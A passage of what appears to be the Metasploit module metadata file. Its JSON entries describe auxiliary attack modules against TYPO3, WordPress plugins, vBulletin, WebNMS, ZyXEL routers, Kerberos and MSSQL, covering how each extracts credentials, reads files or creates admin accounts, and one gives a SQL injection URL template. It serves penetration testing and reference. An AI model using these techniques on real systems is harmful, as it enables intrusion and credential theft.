"rport": 8443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/admin/http/trendmicro_dlp_traversal.rb",
"is_install_path": true,
"ref_name": "admin/http/trendmicro_dlp_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_news_module_sqli": {
"name": "TYPO3 News Module SQL Injection",
"full_name": "auxiliary/admin/http/typo3_news_module_sqli",
"rank": 300,
"disclosure_date": "2017-04-06",
"type": "auxiliary",
"author": [
"Marco Rivoli",
"Charles Fol"
],
"description": "This module exploits a SQL Injection vulnerability in TYPO3 NewsController.php\n in the news module 5.3.2 and earlier. It allows an unauthenticated user to execute arbitrary\n SQL commands via vectors involving overwriteDemand and OrderByAllowed. The SQL injection\n can be used to obtain password hashes for application user accounts. This module has been\n tested on TYPO3 3.16.0 running news extension 5.0.0.\n\n This module tries to extract the username and password hash of the administrator user.\n It injects SQL and checks every letter of a pattern to see\n whether it belongs to the username or password by altering the ordering of results. If\n the letter doesn't belong to the word being extracted then all results are inverted\n (News #2 appears before News #1, so Pattern2 before Pattern1); if instead the letter belongs\n to the word being extracted then the results are in proper order (News #1 appears before News #2,\n so Pattern1 before Pattern2).",
"references": [
"CVE-2017-7581",
"URL-http://www.ambionics.io/blog/typo3-news-module-sqli"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-03-15 10:46:08 +0000",
"path": "/modules/auxiliary/admin/http/typo3_news_module_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_news_module_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_sa_2009_001": {
"name": "TYPO3 sa-2009-001 Weak Encryption Key File Disclosure",
"full_name": "auxiliary/admin/http/typo3_sa_2009_001",
"rank": 300,
"disclosure_date": "2009-01-20",
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module exploits a flaw in the TYPO3 encryption key creation process to allow for\n file disclosure in the jumpUrl mechanism. This flaw can be used to read any file\n that the web server user account has access to view.",
"references": [
"CVE-2009-0255",
"OSVDB-51536",
"URL-http://blog.c22.cc/advisories/typo3-sa-2009-001",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_001.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_001",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_sa_2009_002": {
"name": "Typo3 sa-2009-002 File Disclosure",
"full_name": "auxiliary/admin/http/typo3_sa_2009_002",
"rank": 300,
"disclosure_date": "2009-02-10",
"type": "auxiliary",
"author": [
"spinbad <spinbad.security@googlemail.com>"
],
"description": "This module exploits a file disclosure vulnerability in the jumpUrl mechanism of\n Typo3. This flaw can be used to read any file that the web server user account has\n access to.",
"references": [
"OSVDB-52048",
"CVE-2009-0815",
"URL-http://secunia.com/advisories/33829/",
"EDB-8038",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2009_002.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2009_002",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_sa_2010_020": {
"name": "TYPO3 sa-2010-020 Remote File Disclosure",
"full_name": "auxiliary/admin/http/typo3_sa_2010_020",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley",
"Gregor Kopf"
],
"description": "This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.\n Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.\n This flaw can be used to read any file that the web server user account has access to view.",
"references": [
"CVE-2010-3714",
"URL-http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020",
"URL-http://gregorkopf.de/slides_berlinsides_2010.pdf"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/admin/http/typo3_sa_2010_020.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_sa_2010_020",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/typo3_winstaller_default_enc_keys": {
"name": "TYPO3 Winstaller Default Encryption Keys",
"full_name": "auxiliary/admin/http/typo3_winstaller_default_enc_keys",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Chris John Riley"
],
"description": "This module exploits known default encryption keys found in the TYPO3 Winstaller.\n This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be\n used to read any file that the web server user account has access to view.\n\n The method used to create the juhash (short MD5 hash) was altered in later versions\n of Typo3. Use the show actions command to display and select the version of TYPO3 in\n use (defaults to the older method of juhash creation).",
"references": [
"URL-http://typo3winstaller.sourceforge.net/"
],
"platform": "",
"arch": "",
"rport": 8503,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb",
"is_install_path": true,
"ref_name": "admin/http/typo3_winstaller_default_enc_keys",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/ulterius_file_download": {
"name": "Ulterius Server File Download Vulnerability",
"full_name": "auxiliary/admin/http/ulterius_file_download",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rick Osgood",
"Jacob Robles"
],
"description": "This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0\n to download files from the affected host. A valid file path is needed to download a file.\n Fortunately, Ulterius indexes every file on the system, which can be stored in the\n following location:\n\n http://ulteriusURL:port/.../fileIndex.db.\n\n This module can download and parse the fileIndex.db file. There is also an option to\n download a file using a provided path.",
"references": [
"EDB-43141",
"CVE-2017-16806"
],
"platform": "",
"arch": "",
"rport": 22006,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-02-15 16:31:09 +0000",
"path": "/modules/auxiliary/admin/http/ulterius_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/ulterius_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/vbulletin_upgrade_admin": {
"name": "vBulletin Administrator Account Creation",
"full_name": "auxiliary/admin/http/vbulletin_upgrade_admin",
"rank": 300,
"disclosure_date": "2013-10-09",
"type": "auxiliary",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses the \"install/upgrade.php\" component on vBulletin 4.1+ and 4.5+ to\n create a new administrator account, as exploited in the wild on October 2013. This module\n has been tested successfully on vBulletin 4.1.5 and 4.1.0.",
"references": [
"CVE-2013-6129",
"URL-http://blog.imperva.com/2013/10/threat-advisory-a-vbulletin-exploit-administrator-injection.html",
"OSVDB-98370",
"URL-http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-24 13:18:32 +0000",
"path": "/modules/auxiliary/admin/http/vbulletin_upgrade_admin.rb",
"is_install_path": true,
"ref_name": "admin/http/vbulletin_upgrade_admin",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_admin/http/webnms_cred_disclosure": {
"name": "WebNMS Framework Server Credential Disclosure",
"full_name": "auxiliary/admin/http/webnms_cred_disclosure",
"rank": 300,
"disclosure_date": "2016-07-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract\nall user credentials. The first vulnerability is an unauthenticated file download\nin the FetchFile servlet, which is used to download the file containing the user\ncredentials. The second vulnerability is that the passwords in the file are\nobfuscated with a very weak algorithm which can be easily reversed.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"references": [
"CVE-2016-6601",
"CVE-2016-6602",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
"URL-https://seclists.org/fulldisclosure/2016/Aug/54"
],
"platform": "",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/webnms_cred_disclosure.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_cred_disclosure",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/webnms_file_download": {
"name": "WebNMS Framework Server Arbitrary Text File Download",
"full_name": "auxiliary/admin/http/webnms_file_download",
"rank": 300,
"disclosure_date": "2016-07-04",
"type": "auxiliary",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\nunauthenticated user to download files off the file system by using a directory\ntraversal attack on the FetchFile servlet.\nNote that only text files can be downloaded properly, as any binary file will get\nmangled by the servlet. Also note that for Windows targets you can only download\nfiles that are in the same drive as the WebNMS installation.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"references": [
"CVE-2016-6601",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
"URL-https://seclists.org/fulldisclosure/2016/Aug/54"
],
"platform": "",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/http/webnms_file_download.rb",
"is_install_path": true,
"ref_name": "admin/http/webnms_file_download",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_custom_contact_forms": {
"name": "WordPress custom-contact-forms Plugin SQL Upload",
"full_name": "auxiliary/admin/http/wp_custom_contact_forms",
"rank": 300,
"disclosure_date": "2014-08-07",
"type": "auxiliary",
"author": [
"Marc-Alexandre Montpas",
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "The WordPress custom-contact-forms plugin <= 5.1.0.3 allows unauthenticated users to download\n a SQL dump of the plugins database tables. It's also possible to upload files containing\n SQL statements which will be executed. The module first tries to extract the WordPress\n table prefix from the dump and then attempts to create a new admin user.",
"references": [
"URL-http://blog.sucuri.net/2014/08/database-takeover-in-custom-contact-forms.html",
"URL-https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.3&old=997569&new_path=%2Fcustom-contact-forms%2Ftags%2F5.1.0.4&new=997569&sfp_email=&sfph_mail=",
"WPVDB-7542"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/http/wp_custom_contact_forms.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_custom_contact_forms",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_easycart_privilege_escalation": {
"name": "WordPress WP EasyCart Plugin Privilege Escalation",
"full_name": "auxiliary/admin/http/wp_easycart_privilege_escalation",
"rank": 300,
"disclosure_date": "2015-02-25",
"type": "auxiliary",
"author": [
"rastating"
],
"description": "The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated\n users of any user level to set any system option via a lack of validation in the\n ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in\n /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address\n to prevent any notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default role to\n be administrator. This will allow for the user to create a new account with admin\n privileges via the default registration page found at /wp-login.php?action=register.",
"references": [
"CVE-2015-2673",
"WPVDB-7808",
"URL-https://rastating.github.io/wp-easycart-privilege-escalation-information-disclosure/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_easycart_privilege_escalation",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_gdpr_compliance_privesc": {
"name": "WordPress WP GDPR Compliance Plugin Privilege Escalation",
"full_name": "auxiliary/admin/http/wp_gdpr_compliance_privesc",
"rank": 300,
"disclosure_date": "2018-11-08",
"type": "auxiliary",
"author": [
"Mikey Veenstra (WordFence)",
"Thomas Labadie"
],
"description": "The WordPress GDPR Compliance plugin <= v1.4.2 allows unauthenticated users to set\n WordPress administration options by overwriting values within the database.\n\n The vulnerability is present in WordPress's admin-ajax.php, which allows unauthorized\n users to trigger handlers and make configuration changes because of a failure to do\n capability checks when executing the 'save_setting' internal action.\n\n WARNING: The module sets WordPress configuration options without reading their current\n values and restoring them later.",
"references": [
"URL-https://www.wordfence.com/blog/2018/11/privilege-escalation-flaw-in-wp-gdpr-compliance-plugin-exploited-in-the-wild/",
"CVE-2018-19207",
"WPVDB-9144"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-11-29 06:35:37 +0000",
"path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_gdpr_compliance_privesc",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"SideEffects": [
"config-changes"
]
}
},
"auxiliary_admin/http/wp_google_maps_sqli": {
"name": "WordPress Google Maps Plugin SQL Injection",
"full_name": "auxiliary/admin/http/wp_google_maps_sqli",
"rank": 300,
"disclosure_date": "2019-04-02",
"type": "auxiliary",
"author": [
"Thomas Chauchefoin (Synacktiv)"
],
"description": "This module exploits a SQL injection vulnerability in a REST endpoint\n registered by the WordPress plugin wp-google-maps between 7.11.00 and\n 7.11.17 (included).\n\n As the table prefix can be changed by administrators, set DB_PREFIX\n accordingly.",
"references": [
"CVE-2019-10692",
"WPVDB-9249"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-15 07:06:27 +0000",
"path": "/modules/auxiliary/admin/http/wp_google_maps_sqli.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_google_maps_sqli",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_symposium_sql_injection": {
"name": "WordPress Symposium Plugin SQL Injection",
"full_name": "auxiliary/admin/http/wp_symposium_sql_injection",
"rank": 300,
"disclosure_date": "2015-08-18",
"type": "auxiliary",
"author": [
"PizzaHatHacker",
"Matteo Cantoni <goony@nothink.org>"
],
"description": "This module exploits a SQL injection vulnerability in the WP Symposium plugin\n before 15.8 for WordPress, which allows remote attackers to extract credentials\n via the size parameter to get_album_item.php.",
"references": [
"CVE-2015-6522",
"EDB-37824"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_symposium_sql_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/wp_wplms_privilege_escalation": {
"name": "WordPress WPLMS Theme Privilege Escalation",
"full_name": "auxiliary/admin/http/wp_wplms_privilege_escalation",
"rank": 300,
"disclosure_date": "2015-02-09",
"type": "auxiliary",
"author": [
"Evex",
"rastating"
],
"description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.",
"references": [
"WPVDB-7785"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb",
"is_install_path": true,
"ref_name": "admin/http/wp_wplms_privilege_escalation",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/http/zyxel_admin_password_extractor": {
"name": "ZyXEL GS1510-16 Password Extractor",
"full_name": "auxiliary/admin/http/zyxel_admin_password_extractor",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Daniel Manser",
"Sven Vetsch"
],
"description": "This module exploits a vulnerability in ZyXEL GS1510-16 routers\n to extract the admin password. Due to a lack of authentication on the\n webctrl.cgi script, unauthenticated attackers can recover the\n administrator password for these devices. The vulnerable device\n has reached end of life for support from the manufacturer, so it is\n unlikely this problem will be addressed.",
"references": [
"URL-https://github.com/rapid7/metasploit-framework/pull/2709"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-10-09 17:06:05 +0000",
"path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb",
"is_install_path": true,
"ref_name": "admin/http/zyxel_admin_password_extractor",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/kerberos/ms14_068_kerberos_checksum": {
"name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability",
"full_name": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum",
"rank": 300,
"disclosure_date": "2014-11-18",
"type": "auxiliary",
"author": [
"Tom Maddock",
"Sylvain Monne",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with Mimikatz's\n help. It has been tested successfully on Windows 2008.",
"references": [
"CVE-2014-6324",
"MSB-MS14-068",
"OSVDB-114751",
"URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx",
"URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/",
"URL-https://github.com/bidord/pykek",
"URL-https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit"
],
"platform": "",
"arch": "",
"rport": 88,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb",
"is_install_path": true,
"ref_name": "admin/kerberos/ms14_068_kerberos_checksum",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/maxdb/maxdb_cons_exec": {
"name": "SAP MaxDB cons.exe Remote Command Injection",
"full_name": "auxiliary/admin/maxdb/maxdb_cons_exec",
"rank": 300,
"disclosure_date": "2008-01-09",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "SAP MaxDB is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.",
"references": [
"OSVDB-40210",
"BID-27206",
"CVE-2008-0244"
],
"platform": "",
"arch": "",
"rport": 7210,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb",
"is_install_path": true,
"ref_name": "admin/maxdb/maxdb_cons_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/misc/sercomm_dump_config": {
"name": "SerComm Device Configuration Dump",
"full_name": "auxiliary/admin/misc/sercomm_dump_config",
"rank": 300,
"disclosure_date": "2013-12-31",
"type": "auxiliary",
"author": [
"Eloi Vanderbeken <eloi.vanderbeken@gmail.com>",
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.",
"references": [
"OSVDB-101653",
"URL-https://github.com/elvanderb/TCP-32764"
],
"platform": "",
"arch": "",
"rport": 32764,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb",
"is_install_path": true,
"ref_name": "admin/misc/sercomm_dump_config",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/misc/wol": {
"name": "UDP Wake-On-Lan (WOL)",
"full_name": "auxiliary/admin/misc/wol",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 04:43:37 +0000",
"path": "/modules/auxiliary/admin/misc/wol.rb",
"is_install_path": true,
"ref_name": "admin/misc/wol",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/motorola/wr850g_cred": {
"name": "Motorola WR850G v4.03 Credentials",
"full_name": "auxiliary/admin/motorola/wr850g_cred",
"rank": 300,
"disclosure_date": "2004-09-24",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. A lot\n more information is available through this request, but\n you can get it all and more after logging in.",
"references": [
"CVE-2004-1550",
"OSVDB-10232",
"URL-https://seclists.org/bugtraq/2004/Sep/0339.html"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb",
"is_install_path": true,
"ref_name": "admin/motorola/wr850g_cred",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/ms/ms08_059_his2006": {
"name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability",
"full_name": "auxiliary/admin/ms/ms08_059_his2006",
"rank": 300,
"disclosure_date": "2008-10-14",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.",
"references": [
"MSB-MS08-059",
"CVE-2008-3466",
"OSVDB-49068",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745"
],
"platform": "",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb",
"is_install_path": true,
"ref_name": "admin/ms/ms08_059_his2006",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum": {
"name": "Microsoft SQL Server Configuration Enumerator",
"full_name": "auxiliary/admin/mssql/mssql_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Carlos Perez <carlos_perez@darkoperator.com>"
],
"description": "This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-08-16 21:40:03 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum_domain_accounts": {
"name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration",
"full_name": "auxiliary/admin/mssql/mssql_enum_domain_accounts",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>",
"antti <antti.rantasaari@netspi.com>"
],
"description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. Enumerated\n accounts can then be used in online dictionary attacks.",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms174427.aspx"
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_domain_accounts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": {
"name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration",
"full_name": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>",
"antti <antti.rantasaari@netspi.com>"
],
"description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--",
"references": [
"URL-http://msdn.microsoft.com/en-us/library/ms174427.aspx"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb",
"is_install_path": true,
"ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_admin/mssql/mssql_enum_sql_logins": {
"name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration",
"full_name": "auxiliary/admin/mssql/mssql_enum_sql_logins",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullbind <scott.sutherland@netspi.com>"
],
"description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). Once logins have been enumerated, they can be used in dictionary attacks.",
"references": [
